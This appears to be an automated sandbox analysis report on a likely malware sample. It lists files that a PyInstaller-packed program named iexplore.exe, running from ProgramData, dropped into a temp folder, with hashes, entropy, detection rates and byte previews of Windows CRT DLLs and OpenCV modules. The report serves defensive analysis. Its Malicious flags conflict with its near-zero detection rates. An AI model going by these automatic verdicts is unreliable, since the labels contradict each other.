                                                                                                                  SHA-512:6B99CA77F45063BA4ECDAEA214F42E8EE3431CE03E54F5119C284385408F438273BA3C881BB71BCF4059F8AE5CE6F05A1CF36FC84A65D9BFA9CE595A0A0BE295
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d...`.a.d.....b.d...f.b.d.Richc.d.PE..L....\...........!.........................0...............................@......9.....@.............................a............0..............."... ..............8............................................................................text...A........................... ..`.rsrc........0......................@..@.....\........8...8...8........\........d...p...p...RSDS......B.8<.)6f}....api-ms-win-crt-stdio-l1-1-0.pdb.........8....rdata..8........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02.......................\....>...........................n...................Y...............H...............=...x...........(...e...............$...>...V...n...........................4...U...w.......................:...[...}...................1...U...w................ ..' ..J ..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):17352
                                                                                                                  Entropy (8bit):6.490243600324852
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ZUv8x0C5yguNvZ5VQgx3SbwA7yMVIkFGlvWchWo8f0DBRJwDldl99z3R:avi5yguNvZ5VQgx3SbwA71IkFsb1PY
                                                                                                                  MD5:8DB568B36F13FEEEFD150DA0B63ADCBE
                                                                                                                  SHA1:03BB29284802DB358609C2CD10398D8A5077E417
                                                                                                                  SHA-256:8597F9F239B350B86350F3CDB326BDCA49CB23022703FE049F838998A8A32CD5
                                                                                                                  SHA-512:8D57FA2975E45C2DF82634135E57F29579778A118E033F036BB093E654A9A9D6A0B450C45B24D68FAC2232D3255DBE9C88368EA8F6D697A86D035417B9CE61E6
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d...`.a.d.....b.d...f.b.d.Richc.d.PE..L...>..\...........!.........................0...............................@......`.....@..........................................0..............."...!..............8............................................................................text............................... ..`.rsrc........0......................@..@....>..\........9...8...8.......>..\........d...t...t...RSDS?L..%i.L.3^.h.......api-ms-win-crt-string-l1-1-0.pdb............8....rdata..8........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02...................\................................'...C..._...|.......................1...P...m.......................+...J...i.......................+...K...l.......................2...S...u.......................(...B..._...}......................./...N...m...............

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):13560
                                                                                                                  Entropy (8bit):6.6675957409079505
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZCGYigrDqWchWKU/3XjDBQABJFXfH098uXqnajH/7CBO:EGY36WchWKmXjDBRJ9XuXlT7CBO
                                                                                                                  MD5:8F5ECA7B9BE54BEDE759B2BA2F018BB2
                                                                                                                  SHA1:F7FB27990F9629332074FE4A3703DD3CDACF78B9
                                                                                                                  SHA-256:9E5D937C72C6D5709B907130CF4C2BD12E3427E44D217A2047D461940C281C1F
                                                                                                                  SHA-512:45DE9E9B66303554487016D448C11CC38E6EAD5B48B8660CC311C182A7B3CC20A83063EEF0F4071CA126341B8083F4A55523445B13E060E5B745527E3B6B44D4
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d...`.a.d.....b.d...f.b.d.Richc.d.PE..L...>..\...........!......................... ...............................0.......h....@.......................................... ................... ..............8............................................................................text............................... ..`.rsrc........ ......................@..@....>..\........7...8...8.......>..\........d...p...p...RSDS9[....dF.2$L..t.....api-ms-win-crt-time-l1-1-0.pdb..........8....rdata..8........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.......................\............H...H.......(...H...........<...Z...x.......................6...S...n.......................$...A...^...{.......................B...c.......................&...K...p...........................K...k.......................%...E...^...y...........

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11512
                                                                                                                  Entropy (8bit):6.833217638045214
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:kWfHQdu/WchWtAU/3XjDBQABJWDPJSdqnaj7ej:kWfRWchWtAmXjDBRJmsdl/G
                                                                                                                  MD5:2BC2D1EF644E67C00E139EACD6D6F656
                                                                                                                  SHA1:56F6F85FC0A8F9F382AADD9768AE777895FCFC60
                                                                                                                  SHA-256:C6ACAD7EECD63B54C2F12610B273A6BF5B4DB737C0F8CE7670E778DD7A394E39
                                                                                                                  SHA-512:ECE35C75A697812A113C8FCB625A7E23868E9697BAE814665D28CD016AF5AEDEAE21E0D4374F611992BB29E9EDB9BBA732D5113D7A4A779EE8DEF28B99509A5D
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d...`.a.d.....b.d...f.b.d.Richc.d.PE..L......\...........!......................... ...............................0......a.....@.............................^............ ................... ..............8............................................................................text...>........................... ..`.rsrc........ ......................@..@.......\........:...8...8..........\........d...t...t...RSDS..t..-.A.y2=D.......api-ms-win-crt-utility-l1-1-0.pdb...........8....rdata..8........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02...................\....4...........................]...~...................%...<...U...r...............................+...B...W...p.................................../...V...m.......................5...L...g...............................!...>...O...h.......................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1024268
                                                                                                                  Entropy (8bit):5.540443460646943
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:PGHcjTosQNRs54PK4IOGpiD8pVi+ZEf6EfmLSKvFVLJ:PGHcjTosQNRs54PK4IPZ7LvZ
                                                                                                                  MD5:8386CF8ADD72BAB03573064B6E1D89D2
                                                                                                                  SHA1:C451D2F3EED6B944543F19C5BD15AE7E8832BBD4
                                                                                                                  SHA-256:2EEA4B6202A6A6F61CB4D75C78BE5EC2E1052897F54973797885F2C3B24D202C
                                                                                                                  SHA-512:2BB61F7FAC7ECC7D5654756AE8286D5FD9E2730E6AC42F3E7516F598E00FD8B9B6D3E77373994BB31D89831278E6833D379F306D52033FA5C48A786AC67DA2B2
                                                                                                                  Malicious:false
                                                                                                                  Preview:PK..........!..1Y............_bootlocale.pycB................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJy.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale)...do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc................C........d.S.).N..UTF-8r....).r....r....r....r....r...............c................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).N..UTF-8r....).r....r....r......localer....).r....r....r....r....r....r.....................c................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).N..UTF-8..darwin)...AssertionErro

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6756
                                                                                                                  Entropy (8bit):4.965960355988947
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:cHqnQbu/POjcEYIL9GE6AUmZris46/B5aVOQOo2/nH/h5M966GMBWtReWE3uSI8G:2qQSOjIKtc6/Bb/H/h2BWtc93k
                                                                                                                  MD5:EAB99B31F1FD18E46E6E081BA3B5C06E
                                                                                                                  SHA1:9CA76B1097D58EF9C652AEBFBEFF32BFEC17B25B
                                                                                                                  SHA-256:B05B8000C71987CD4DF824C1ED134B7FCD34617665E437B1AAEC128F93D7F1C3
                                                                                                                  SHA-512:7C4EA4A28F7876249B503155187BD59BCD9CF18A80264C8892E59E9FD7F3D461C91AFC4C3C177DBA48E1DFDD0FEB5705B54B504F7DAA886A2A0B72FDDD1E80FC
                                                                                                                  Malicious:false
                                                                                                                  Preview:'''..OpenCV Python binary extension loader..'''..import os..import importlib..import sys....__all__ = []....try:.. import numpy.. import numpy.core.multiarray..except ImportError:.. print('OpenCV bindings requires "numpy" package.').. print('Install it via command:').. print(' pip install numpy').. raise....# TODO..# is_x64 = sys.maxsize > 2**32......def __load_extra_py_code_for_module(base, name, enable_debug_print=False):.. module_name = "{}.{}".format(__name__, name).. export_module_name = "{}.{}".format(base, name).. native_module = sys.modules.pop(module_name, None).. try:.. py_module = importlib.import_module(module_name).. except ImportError as err:.. if enable_debug_print:.. print("Can't load Python code for module:", module_name,.. ". Reason:", err).. # Extension doesn't contain extra py code.. return False.... if not hasattr(base, name):.. setattr(sys.modules[base], name, py_

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\config-3.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):748
                                                                                                                  Entropy (8bit):5.110506159030977
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:WSolITEO+RNIdjcFMlYFXe2LirYKMLFxAe5bHMnQBwmuTD9+sXWeZKMLFxAe5biw:MlY+34jamr0L7Ae5oJP9+oJL7Ae5mU9L
                                                                                                                  MD5:E8ED8F25854821C8910BCB8308507DCE
                                                                                                                  SHA1:8A3AC32D3DF44794E8A834A6B6A8A1ED3F3AA5F7
                                                                                                                  SHA-256:DE28C7B5213CCA148F09469916584611B3D66C1C8C432880259D6A3A92380213
                                                                                                                  SHA-512:F3F36EDF288A870F5E1F14F3B1113031721E12F30BF235B0E5385711E2BF7F08D0123E6AB14600AB069D2E692D81B7ABC3692FB69EED34374FEFAB3B24F03D86
                                                                                                                  Malicious:false
                                                                                                                  Preview:PYTHON_EXTENSIONS_PATHS = [.. LOADER_DIR..] + PYTHON_EXTENSIONS_PATHS....ci_and_not_headless = False....try:.. from .version import ci_build, headless.... ci_and_not_headless = ci_build and not headless..except:.. pass....# the Qt plugin is included currently only in the pre-built wheels..if sys.platform.startswith("linux") and ci_and_not_headless:.. os.environ["QT_QPA_PLATFORM_PLUGIN_PATH"] = os.path.join(.. os.path.dirname(os.path.abspath(__file__)), "qt", "plugins".. )....# Qt will throw warning on Linux if fonts are not found..if sys.platform.startswith("linux") and ci_and_not_headless:.. os.environ["QT_QPA_FONTDIR"] = os.path.join(.. os.path.dirname(os.path.abspath(__file__)), "qt", "fonts".. )..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\config.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):123
                                                                                                                  Entropy (8bit):5.182096540135453
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:JSxrsr+A6+Ei7/erj5Erj+7IE7Qs5O8nkz6+Eov:arsrFEoidAM7Qs5PkBEy
                                                                                                                  MD5:B13875A78A67CC7F21E7481CA29508C5
                                                                                                                  SHA1:D0EB50F0F915B3707A390C18D0AB511306504A70
                                                                                                                  SHA-256:BBCBA68E122CF9754D5E549BC17C0F8780FE120B1A9D004C993792DDE654F96C
                                                                                                                  SHA-512:BAF58DA8EB61898F3E59BCB047F46873912FA088B5C25EEE0954F6FFD3CFDC681BD16C2F50C47158718F06978490DE04AAE78A32AC3BA5DE1555AC54C2E529FF
                                                                                                                  Malicious:false
                                                                                                                  Preview:import os....BINARIES_PATHS = [.. os.path.join(os.path.join(LOADER_DIR, '../../'), 'x86/vc14/bin')..] + BINARIES_PATHS..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\cv2.pyd

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):48732672
                                                                                                                  Entropy (8bit):6.7539525149845465
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:786432:DhdkxoJUjm7c86qXQW0vgkPFZz8M6z2SO/fKxtIqai2o9tgd0n8SW3Fo6/bgeN5K:nk/jcwqXQW0vgkPFZz8M6z2SO/fKxtIH
                                                                                                                  MD5:3617796D129917E84C551B0547935B9A
                                                                                                                  SHA1:03BD22DD8B3CEFD09F862F3BA1AD1725F076C805
                                                                                                                  SHA-256:3739513D36E4B18E935A6A7C041ECD60617CF88517D7BCA64D5F1C3439DD47E0
                                                                                                                  SHA-512:21AEDC7B555C6A3A537FDBE0C56E420B157E0E3578F49A07A7D68657BB679E4BADD876ECCA426825F9455CCC2DF413E57EC704B35F92E1C8B7BB86466FD89DFF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........x;`..U3..U3..U3.DV2..U3.DP2..U3.DQ2..U3.DR2..U38..3..U3.GV2..U3.GP2..U3.GQ2..U3.DS2..U3..3".U3..U3..U3.DT2..U3.GQ2{.U3.GT2..U3..T3..U3.GP2..U3.GU2..U3.G.3..U3.GW2..U3Rich..U3........PE..L...R..d...........!......?...................?...........................................@.............................\.......@...............................L$......T...................4..........@.............?..............................text....L2......N2................. ..`IPPCODE..c...`2..d...R2............. ..`.rdata...N....?..P....?.............@..@.data....+... ......................@....tls.........P....... ..............@....gfids.......`......."..............@..@_RDATA...8.......:...8..............@..@.rsrc................r..............@..@.reloc..L$.......&...t..............@..B................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\data\__init__.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):73
                                                                                                                  Entropy (8bit):4.5164686969838375
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:JSxrGSCcurj5ErAwGfnJFB:arGSLSdAAb
                                                                                                                  MD5:734F2F32C81B5CEDE1098394DAB581B5
                                                                                                                  SHA1:E07450D3F1924078DD09E0B1DEA8DD671DFE8801
                                                                                                                  SHA-256:F4CE16721ED7F623A4DCC443BA600D1856DB610CB2C3D53C13A8CA028CC68F6D
                                                                                                                  SHA-512:C0C9ADD6A1CD47F34C91B12AD369E887CFD28859824D258E1EED0C3495378DD950E214F8A540D66CD555ED8EFC810418DF3F13E09765D24D6FA26B09B44857C0
                                                                                                                  Malicious:false
                                                                                                                  Preview:import os....haarcascades = os.path.join(os.path.dirname(__file__), "")..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\gapi\__init__.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9910
                                                                                                                  Entropy (8bit):4.699400257943882
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:mIntUjnLP6P7B4D7BP7Bb7BSw6DfaPt0C2Vqed/:m2eBN4faPt0C2V9Z
                                                                                                                  MD5:C1F227A47A3F83C8E8C6F81F02FA0178
                                                                                                                  SHA1:94414DF87CBA543A4E3DEA2F62AE99039FA752D1
                                                                                                                  SHA-256:058B29FADBF9A8DFCC649F5505A9251E16F5F05E59109385B9FC289F8C9CCE4A
                                                                                                                  SHA-512:891B81456D86757F61497652C6EE913388B7FBC0C7FA40FA47BB35DFD4A68CD113B62C3690DFC6DF7D5594B8C87F75C09212569F6EAD2C4476A8966CD9EA718A
                                                                                                                  Malicious:false
                                                                                                                  Preview:__all__ = ['op', 'kernel']....import sys..import cv2 as cv....# NB: Register function in specific module..def register(mname):.. def parameterized(func):.. sys.modules[mname].__dict__[func.__name__] = func.. return func.. return parameterized......@register('cv2.gapi')..def networks(*args):.. return cv.gapi_GNetPackage(list(map(cv.detail.strip, args)))......@register('cv2.gapi')..def compile_args(*args):.. return list(map(cv.GCompileArg, args))......@register('cv2')..def GIn(*args):.. return [*args]......@register('cv2')..def GOut(*args):.. return [*args]......@register('cv2')..def gin(*args):.. return [*args]......@register('cv2.gapi')..def descr_of(*args):.. return [*args]......@register('cv2')..class GOpaque():.. # NB: Inheritance from c++ class cause segfault... # So just aggregate cv.GOpaqueT instead of inheritance.. def __new__(cls, argtype):.. return cv.GOpaqueT(argtype).... class Bool():.. def __new__(self):..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\load_config_py3.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):271
                                                                                                                  Entropy (8bit):4.627093215673309
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:SoSvYFyMXS/qdadew7mZ6ALNCpvdYZ4un:kUFuT7mZlCpFw4u
                                                                                                                  MD5:EED4002FFE913424133D8F19FDF1C2A8
                                                                                                                  SHA1:F232D4C5ACF73885D8E0D70418FB2E1481D9271B
                                                                                                                  SHA-256:FF583A5874BE8F848E73C2F61B3A71680995926479C9BC436E6565C5CCE7CA07
                                                                                                                  SHA-512:115F32B21E99DEC9B50C766CC685F9387A0D0C1611A41540CA23B71579E2963E04A1E940C6C8F3447A26006DBC45F17013A7FFE97BE620B74F1CF20A21505B8E
                                                                                                                  Malicious:false
                                                                                                                  Preview:# flake8: noqa..import os..import sys....if sys.version_info[:2] >= (3, 0):.. def exec_file_wrapper(fpath, g_vars, l_vars):.. with open(fpath) as f:.. code = compile(f.read(), os.path.basename(fpath), 'exec').. exec(code, g_vars, l_vars)..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\mat_wrapper\__init__.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):900
                                                                                                                  Entropy (8bit):4.775144685082797
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:07TR5S1i0N0QhKNAhno3oBoIVbOXono6RnZB:07SzN0QhKNuniM5iC/r
                                                                                                                  MD5:BC3A642376D2A30F669D2E649E726487
                                                                                                                  SHA1:9370B736A43871731AF68CF288A7F6A216890D62
                                                                                                                  SHA-256:DA6F165BDCA81F9F624275B248BC7C7C76C36E77CB87EBA08167CD5F2E6BD658
                                                                                                                  SHA-512:52D56B4E6B3E6559446162D40F47C30EFD30BEED2154CC770FD6E8FA1E66278EC569529F1CB2CE7F94FE9D6AE3BDA68AEAC18891B8E30CCE0C6070C1DA994095
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:__all__ = []....import sys..import numpy as np..import cv2 as cv....# NumPy documentation: https://numpy.org/doc/stable/user/basics.subclassing.html....class Mat(np.ndarray):.. '''.. cv.Mat wrapper for numpy array..... Stores extra metadata information how to interpret and process of numpy array for underlying C++ code... '''.... def __new__(cls, arr, **kwargs):.. obj = arr.view(Mat).. return obj.... def __init__(self, arr, **kwargs):.. self.wrap_channels = kwargs.pop('wrap_channels', getattr(arr, 'wrap_channels', False)).. if len(kwargs) > 0:.. raise TypeError('Unknown parameters: {}'.format(repr(kwargs))).... def __array_finalize__(self, obj):.. if obj is None:.. return.. self.wrap_channels = getattr(obj, 'wrap_channels', None)......Mat.__module__ = cv.__name__..cv.Mat = Mat..cv._registerMatType(Mat)..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc\__init__.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):38
                                                                                                                  Entropy (8bit):3.968211974414884
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:1LT2QbQNQ4yL9v:1LT2Q8NQ4yJ
                                                                                                                  MD5:C6B0244719659C5EDEC0592AF112032A
                                                                                                                  SHA1:6BD926FE0C853A9938BDB5D9537BD88FD1EF5401
                                                                                                                  SHA-256:495BD79594CCE174673E372C85C4DD8F4FFDF2B3A73FD4623955B0D55DE0D462
                                                                                                                  SHA-512:28D80015309AC1AE19F048E9461D4D04B85CE16B9E68C58D7608351A39B8D3EC0235FCCFD928B0349082C702D890B6C6ABD36B8030A176BF05888AE8C493B545
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:from .version import get_ocv_version..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc\version.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):95
                                                                                                                  Entropy (8bit):4.525707419533802
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:JS4iydoKE4yLYfg+4zxNG364yLA9E5HJwv:mIXE4y0YpE6405pwv
                                                                                                                  MD5:2D3125F1843A670B9F3229A7BC362816
                                                                                                                  SHA1:E884BC3D05E5E732D1308DE67AA5F96BBF4FC69F
                                                                                                                  SHA-256:C93A418793FCB15B9B4316C0741B8336740E490E94F3B7D1EBE8CD5F6F23815C
                                                                                                                  SHA-512:BFDCF6BFC1D82E3ACAF625B5940CA169784427712F14895FD6CA92CC9C864F1A894FECF97BF2AFA6FC5CF4ABA9738A302D30024BC192F85025989C0D93A8B540
                                                                                                                  Malicious:false
                                                                                                                  Preview:import cv2......def get_ocv_version():.. return getattr(cv2, "__version__", "unavailable")..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\opencv_videoio_ffmpeg480.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23381504
                                                                                                                  Entropy (8bit):6.5878622643446985
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:393216:xImauu+SZNC39wUM9vzz22/OqDOGtNTtfmk4070bcgT2hONn6q+:zaHNC39A9v3RDOGtNTt7zEPNk
                                                                                                                  MD5:4AAEF1456E282E5EF665D65555F47F56
                                                                                                                  SHA1:C2766BAF02B13751AE27A4CAE3C9A9170B3A5A68
                                                                                                                  SHA-256:7543FCB050670136CF1CB50850B35348BFA924299D398E92C1506EC1A665A6AB
                                                                                                                  SHA-512:E2C24273F632D4E51068F7FBD663FCB68C1175EDA666CED3460ECD01ACE7F786EF6F59D9B49042E695AC8F4A519BA6580ED4D3239BB8E589CC18FD7DE2F7AACB
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..."..!...d..$............!....h.........................P........e....... ......................p..................(........................|............................^.....................d................................text...4.!.......!.................`.P`.data...\.....!.......!.............@.`..rdata..0.:..`$...:..F$.............@..@.rodata. ....0_......._.............@.P@.bss.....#...@_.......................`..edata.......p........_.............@.0@.idata........... ... _.............@.0..CRT....0............@_.............@.0..tls.................B_.............@.0..rsrc...(............D_.............@.0..reloc...|.......~...H_.............@.0B........................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\typing\__init__.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5440
                                                                                                                  Entropy (8bit):5.151472270533444
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:c9ACTXc/yidAKdpJkKbmFr0Tamlrp8GJGRME0vjV:c3zji+KNbsr03/8xRME0R
                                                                                                                  MD5:8C144A878842AE4A3DC9702B6B09B7BC
                                                                                                                  SHA1:B21914E7F7EAF429597D506A65A23174E5B580E1
                                                                                                                  SHA-256:BB2F1B8438FCE33CF1A0C45C058E0009328E1E83AE2DE9E6EF76CF210D62DA02
                                                                                                                  SHA-512:F17FD8F189C2079ECCE847F0F562318A8736D012B1B0EFD38C7F8DEAA58F4F69577A99205DF4009743C83F7184024511ED7A8F0F2881A82BD476C22B2E0C287A
                                                                                                                  Malicious:false
                                                                                                                  Preview:__all__ = [.. "IntPointer",.. "MatLike",.. "MatShape",.. "Size",.. "Size2f",.. "Scalar",.. "Point",.. "Point2i",.. "Point2f",.. "Point2d",.. "Point3i",.. "Point3f",.. "Point3d",.. "Range",.. "Rect",.. "Rect2i",.. "Rect2d",.. "Moments",.. "RotatedRect",.. "TermCriteria",.. "Vec2i",.. "Vec2f",.. "Vec2d",.. "Vec3i",.. "Vec3f",.. "Vec3d",.. "Vec4i",.. "Vec4f",.. "Vec4d",.. "Vec6f",.. "FeatureDetector",.. "DescriptorExtractor",.. "FeatureExtractor",.. "GProtoArg",.. "GProtoInputArgs",.. "GProtoOutputArgs",.. "GRunArg",.. "GOptRunArg",.. "GMetaArg",.. "Prim",.. "Matx33f",.. "Matx33d",.. "Matx44f",.. "Matx44d",.. "GTypeInfo",.. "ExtractArgsCallback",.. "ExtractMetaCallback",.. "LayerId",.. "IndexParams",.. "SearchParams",.. "map_string_and_string",.. "map_string_and_int",.. "map_string_and_vector_size_t",.. "map_string_and_vector_flo

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\utils\__init__.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):344
                                                                                                                  Entropy (8bit):4.438685267245838
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:1zBhJDyTH2XE2OTH2XRxEMGMBrMhWcROEoiZAIfH2Xc10F9vSumHcROEoiZWf:1zBHyLkOLejrMYccRIfh0FNSfcct
                                                                                                                  MD5:952D77A31C0171AE90C0086AA8E3FCC7
                                                                                                                  SHA1:000D22FD5A2545CEFBBF294D63415E82E232820A
                                                                                                                  SHA-256:2B16990B35B569AF1CA7239DC10F7B24EC62F27A46626B1E2F1271D2E1AA3554
                                                                                                                  SHA-512:36E5BEA12CDF8AE29D737F7062923AE4A1DBDB2C98904F9A35559222119FAFA836C4A7553F5CD9F5639043183155F5E93DFE731EBCF385349A8E4CA72D2E92B6
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:from collections import namedtuple....import cv2......NativeMethodPatchedResult = namedtuple("NativeMethodPatchedResult",.. ("py", "native"))......def testOverwriteNativeMethod(arg):.. return NativeMethodPatchedResult(.. arg + 1,.. cv2.utils._native.testOverwriteNativeMethod(arg).. )..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\version.py

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):96
                                                                                                                  Entropy (8bit):4.607207460481909
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:K2T2Q4hLCQRi+gI/aIysi+gIgZPGXV:K2Tb4HvgMaDR1CV
